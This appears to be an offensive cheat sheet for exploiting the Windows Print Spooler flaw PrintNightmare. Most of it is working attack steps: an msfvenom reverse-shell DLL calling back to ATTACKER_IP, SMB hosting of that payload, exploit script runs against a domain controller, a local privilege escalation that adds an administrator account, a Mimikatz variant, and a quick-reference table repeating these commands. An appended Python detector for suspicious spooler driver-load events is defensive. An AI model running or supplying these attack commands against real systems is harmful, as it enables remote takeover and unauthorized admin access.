
Overview

CVE-2021-34527 (PrintNightmare): an attacker-supplied DLL is loaded as a printer driver by the Print Spooler service. Two variants: RCE (remote, against a spooler reachable over RPC/SMB) and LPE (local privilege escalation on a host where the spooler runs).

Check Spooler Running

# From a Linux host: look for the spooler's RPC interface (MS-RPRN) on the target
impacket-rpcdump DC_IP | grep -i "spoolsv\|MS-RPRN"
# Locally on the target (PowerShell): is the service running?
Get-Service Spooler
# Is the spooler named pipe exposed over SMB?
ls \\DC_IP\pipe\spoolss

RCE — Remote

Host DLL

# Generate DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Host via SMB
impacket-smbserver share . -smb2support

Exploit

# https://github.com/cube0x0/CVE-2021-1675
python3 CVE-2021-1675.py DOMAIN/user:password@DC_IP '\\ATTACKER_IP\share\evil.dll'

LPE — Local Privilege Escalation

# https://github.com/calebstewart/CVE-2021-1675
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -DriverName "PrintMe" -NewUser "hacker" -NewPassword "Password123!"
Adds a local administrator account with the given name and password.

Mimikatz Method

misc::printnightmare /server:DC_IP /library:\\ATTACKER_IP\share\evil.dll
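Detection-side counterpart to the driver-load technique used by every variant above, as an added example that is not part of this page or of any of the linked tools: it triages records modelled on Microsoft-Windows-PrintService/Operational event IDs 316 (printer driver added or updated) and 808 (spooler failed to load a plug-in module), flagging drivers whose files come from a UNC share and plug-in load failures. Hostnames, paths, driver names and message wording are constructed sample values.

```python
import re

# Constructed sample records modelled on PrintService/Operational events 316 and 808.
# Illustrative only, not captured logs.
SAMPLE_EVENTS = [
    {"id": 316, "host": "DC01",
     "msg": "Printer driver PrintMe for Windows x64 Version-3 was added or updated. "
            "Files:- \\\\10.0.0.5\\share\\evil.dll, UNIDRV.DLL. No user action is required."},
    {"id": 316, "host": "WS07",
     "msg": "Printer driver HP Universal Printing PCL 6 for Windows x64 Version-3 was added or updated. "
            "Files:- C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpcu230u.dll. No user action is required."},
    {"id": 808, "host": "DC01",
     "msg": "The print spooler failed to load a plug-in module "
            "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\New\\evil.dll, error code 0x7e."},
    {"id": 307, "host": "WS07", "msg": "Document 12, Print Document owned by alice was printed."},
]

UNC_PATH = re.compile(r"\\\\[\w.-]+\\[^\s,]+")          # \\host\share\file
DRIVER_NAME = re.compile(r"Printer driver (.+?) for Windows")
MODULE_PATH = re.compile(r"plug-in module (.+?), error code")

def triage_event(event):
    """Return a finding dict if the event looks like spooler driver abuse, else None."""
    eid, msg = event["id"], event["msg"]
    if eid == 316:
        # A normal driver install copies files from a local driver package; a driver
        # whose file list points at a remote share is how the exploit delivers its DLL.
        remote = UNC_PATH.findall(msg)
        if remote:
            name = DRIVER_NAME.search(msg)
            return {"host": event["host"], "event_id": 316,
                    "reason": "driver files sourced from UNC path",
                    "driver": name.group(1) if name else "?", "paths": remote}
    elif eid == 808:
        # A failed plug-in load is common after the exploit, since the DLL is not a real driver.
        mod = MODULE_PATH.search(msg)
        return {"host": event["host"], "event_id": 808,
                "reason": "spooler failed to load plug-in module",
                "paths": [mod.group(1)] if mod else []}
    return None

def triage(events):
    """Run triage_event over a list of records and keep only the hits."""
    return [f for f in (triage_event(e) for e in events) if f]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['host']}: event {f['event_id']} - {f['reason']}: {', '.join(f['paths'])}")
```

Feed it real records exported from the PrintService/Operational log (enable the log first; it is off by default) and treat any 316 with a UNC source as an incident, not a ticket.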

Quick Reference

| Task | Command |
| --- | --- |
| Check spooler | `rpcdump DC_IP \| grep spoolsv` |
| RCE | `CVE-2021-1675.py DOMAIN/user:pass@DC '\\ATK\share\evil.dll'` |
| LPE | `Invoke-Nightmare -NewUser hacker -NewPassword Pass123!` |